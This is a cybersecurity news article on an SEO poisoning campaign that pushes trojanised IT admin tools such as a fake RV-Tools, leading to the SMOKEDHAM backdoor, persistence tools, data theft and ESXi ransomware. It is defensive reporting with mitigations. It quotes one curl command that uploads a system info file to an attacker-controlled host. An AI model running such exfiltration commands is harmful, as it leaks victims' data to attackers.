Hackers Attacking IT Admins by Poisoning SEO to Move Malware on Top of Search Results

Cybersecurity experts have uncovered a sophisticated attack campaign targeting IT administrators through search engine optimization (SEO) poisoning tactics. Threat actors are leveraging advanced SEO techniques to push malicious versions of commonly used administrative tools to the top of search engine results, creating a dangerous trap for unsuspecting IT professionals. When administrators search for legitimate tools, […] The post Hackers Attacking IT Admins by Poisoning SEO to Move Malware on Top of Search Results appeared first on Cyber Security News.

May 10, 2025 - 04:31
 0
Hackers Attacking IT Admins by Poisoning SEO to Move Malware on Top of Search Results

Cybersecurity experts have uncovered a sophisticated attack campaign targeting IT administrators through search engine optimization (SEO) poisoning tactics.

Threat actors are leveraging advanced SEO techniques to push malicious versions of commonly used administrative tools to the top of search engine results, creating a dangerous trap for unsuspecting IT professionals.

When administrators search for legitimate tools, they instead download weaponized versions that appear authentic but contain hidden malicious payloads designed to compromise entire corporate networks.

These attacks represent a concerning shift in threat actor methodology, moving away from traditional phishing campaigns toward more targeted “watering hole” approaches.

The malicious payloads often include the legitimate administrative software that victims were searching for, running it alongside backdoor code that establishes command and control channels without triggering immediate suspicion.

This dual functionality allows the malware to operate in stealth mode while administrators believe they’re simply using the tools they intended to download.

Varonis researchers identified multiple cases where SEO poisoning led to significant network compromises through this attack vector.

In one particularly severe case documented by Tom Barnea and Simon Biggs from the Varonis MDDR Forensics team, a domain administrator downloaded what appeared to be RV-Tools, a popular VMware monitoring utility, from a website that had been artificially boosted to appear at the top of search results.

The attack chain begins when an administrator downloads and executes what appears to be legitimate software from a compromised or malicious website.

Upon execution, the malware deploys additional components that enable persistent access to the compromised device.

In the documented case, the initial access led to the deployment of a PowerShell-based .NET backdoor known as SMOKEDHAM, which provided attackers with a foothold in the network.

Once initial access is established, attackers conduct reconnaissance through a series of system commands to gather information about the environment.

The command output is typically saved to a hidden location and exfiltrated to attacker-controlled infrastructure.

Attack flow

In the observed attack, the threat actors uploaded system data to an Amazon EC2 instance disguised as PNG image files using curl commands such as:-

curl - F " data=@ C:\ProgramData\sysinfo. txt" http://attacker-controlled-ec2.amazonaws.com/upload. php
Attack flow (Source – Varonis)

The attackers’ persistence mechanism involves deploying additional remote access tools under innocuous names.

In the documented case, the threat actor installed an employee monitoring software called Kickidler (renamed to “grabber.exe”) and KITTY (renamed to “fork.exe”) for creating SSH tunnels.

These tools allowed them to maintain access even if the initial backdoor was discovered and removed.

After establishing persistence, attackers typically pause activity for several days before beginning lateral movement.

This pause may serve multiple purposes: allowing time for credential harvesting, avoiding detection by security tools looking for suspicious activity patterns, or simply reflecting a handoff between automated initial compromise and human-operated follow-up actions.

The end result of these attacks is often catastrophic for organizations. In the case studied by Varonis, attackers exfiltrated nearly a terabyte of sensitive data using the file transfer utility WinSCP before ultimately deploying ransomware that encrypted virtual machine disk files (VMDKs) on ESXi servers, causing significant business disruption.

Organizations can protect themselves by implementing strict application whitelisting, monitoring for unusual admin activities, restricting remote access protocols, and providing specialized security awareness training for IT staff who frequently download administrative utilities.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.

The post Hackers Attacking IT Admins by Poisoning SEO to Move Malware on Top of Search Results appeared first on Cyber Security News.